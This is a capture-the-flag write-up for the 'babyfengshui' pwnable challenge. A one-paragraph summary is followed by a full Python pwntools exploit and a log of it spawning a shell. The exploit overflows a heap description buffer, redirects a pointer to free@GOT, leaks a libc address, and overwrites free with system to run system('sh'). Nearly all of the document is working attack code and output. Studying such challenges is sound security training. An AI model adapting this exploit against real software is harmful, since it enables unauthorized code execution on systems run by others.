Category : pwnable
Summary : heap overflow in the description buffer (the "text length" is accepted independently of the allocated size). The overflow rewrites a neighbouring entry's description pointer to point at free@GOT, which gives a libc leak through "show" and a GOT overwrite (free → system) through "update"; deleting an entry whose description is "sh" then runs system("sh").
Exploit
#!/usr/bin/python
from pwn import *
def cmd_add(alloc_size, input_size, name, data):
    """Menu action 0: create an entry.

    The binary asks for the description's allocation size and, separately,
    for how many bytes of text it should read into it.  Nothing in this
    wrapper ties the two together, and the exploit deliberately sends an
    input_size larger than alloc_size to overflow the description buffer.

    alloc_size -- value answered to 'size of description: '
    input_size -- value answered to 'text length: '
    name       -- entry name
    data       -- description bytes (may be longer than alloc_size)
    """
    # Prompt/answer pairs in the exact order the menu asks for them.
    dialogue = (
        ('Action', '0'),
        ('size of description: ', str(alloc_size)),
        ('name: ', name),
        ('text length: ', str(input_size)),
        ('text: ', data),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sl(answer)
def cmd_del(idx):
    """Menu action 1: delete entry idx.

    The exploit's final step relies on this freeing the entry's description
    buffer, after free@GOT has been redirected to system.
    """
    for prompt, answer in (('Action', '1'), ('index: ', str(idx))):
        ru(prompt)
        sl(answer)
def cmd_show(idx):
    """Menu action 2: print entry idx and return (name, description).

    Both fields are read with recvline(keepends=False), i.e. up to and
    excluding the first newline.  A description holding raw bytes (the libc
    leak below) is therefore truncated at the first 0x0a byte, if any.
    """
    for prompt, answer in (('Action', '2'), ('index: ', str(idx))):
        ru(prompt)
        sl(answer)
    fields = []
    for label in ('name: ', 'description: '):
        ru(label)
        fields.append(rl(False))
    return tuple(fields)
def cmd_update(idx, input_size, data):
    """Menu action 3: rewrite entry idx's description.

    input_size bytes of data are sent as the new description text.  The
    exploit uses this, after redirecting entry 1's description pointer at
    free@GOT, as a 4-byte write into the GOT.
    """
    dialogue = (
        ('Action', '3'),
        ('index: ', str(idx)),
        ('text length: ', str(input_size)),
        ('text: ', data),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sl(answer)
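free_got = 0x0804b010  # GOT slot of free() in the 32-bit, non-PIE binary
# Offsets of free() and system() inside the target's libc.  They are specific
# to the libc build the challenge ran with; re-derive them (e.g. from the
# libc ELF's symbol table) before running against another environment, or the
# GOT overwrite below lands in the wrong place.
libc_free_off = 0x70750
libc_system_off = 0x3a940
s = process('./babyfengshui')
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send
# Heap grooming: four entries, then free #0 and #2.  The payload below assumes
# the next 0x80-byte description is served from one of those freed slots and
# sits directly before entry #1's description chunk in memory.
cmd_add(0x20, 0x20, 'name', 'desc')
cmd_add(0x10, 0x10, 'overwriteme', 'desc2')
cmd_add(0x20, 0x20, 'name3', 'desc3')
cmd_add(0x100, 0x100, 'name4', 'sh')  # 'sh' becomes system()'s argument at the end
cmd_del(0)
cmd_del(2)
# Overflow payload: fill the 0x80-byte description, then rewrite what follows:
# a chunk header (size 0x19 matches entry #1's 0x10-byte description), its
# 0x10 bytes of data, a second chunk header (0x89 matches entry #1's 0x80-byte
# struct), and the struct's first field -- the description pointer -- which is
# redirected at free@GOT.  Sizes are rewritten with their original values so
# the allocator keeps working.
pay = ''.join([
    'a' * 0x80,
    p32(0) + p32(0x19),
    'a' * 0x10,
    p32(0) + p32(0x89),
    p32(free_got),
    'overwriteok',
])
# input_size (len(pay)) deliberately exceeds alloc_size (0x80): that is the bug.
cmd_add(0x80, len(pay), 'name', pay)
# Entry #1's description now points into the GOT, so "show" prints the bytes
# at free@GOT, i.e. free()'s resolved libc address.
_, leak = cmd_show(1)
# printf stops at the first NUL (and recvline at the first newline), so an
# address containing such a byte comes back short.  Fail loudly rather than
# hand u32 fewer than 4 bytes and compute a bogus base.
if len(leak) < 4:
    raise ValueError('short libc leak (%d bytes): %r' % (len(leak), leak))
libc_base = u32(leak[0:4]) - libc_free_off
libc_system = libc_base + libc_system_off
# Same redirected pointer, now used as a write: free@GOT := system.
cmd_update(1, 4, p32(libc_system))
# Deleting entry #3 frees its 'sh' description -- now system("sh").
cmd_del(3)
s.interactive()
s.close()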
$ python ex.py
[+] Starting local process './babyfengshui': pid 128654
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)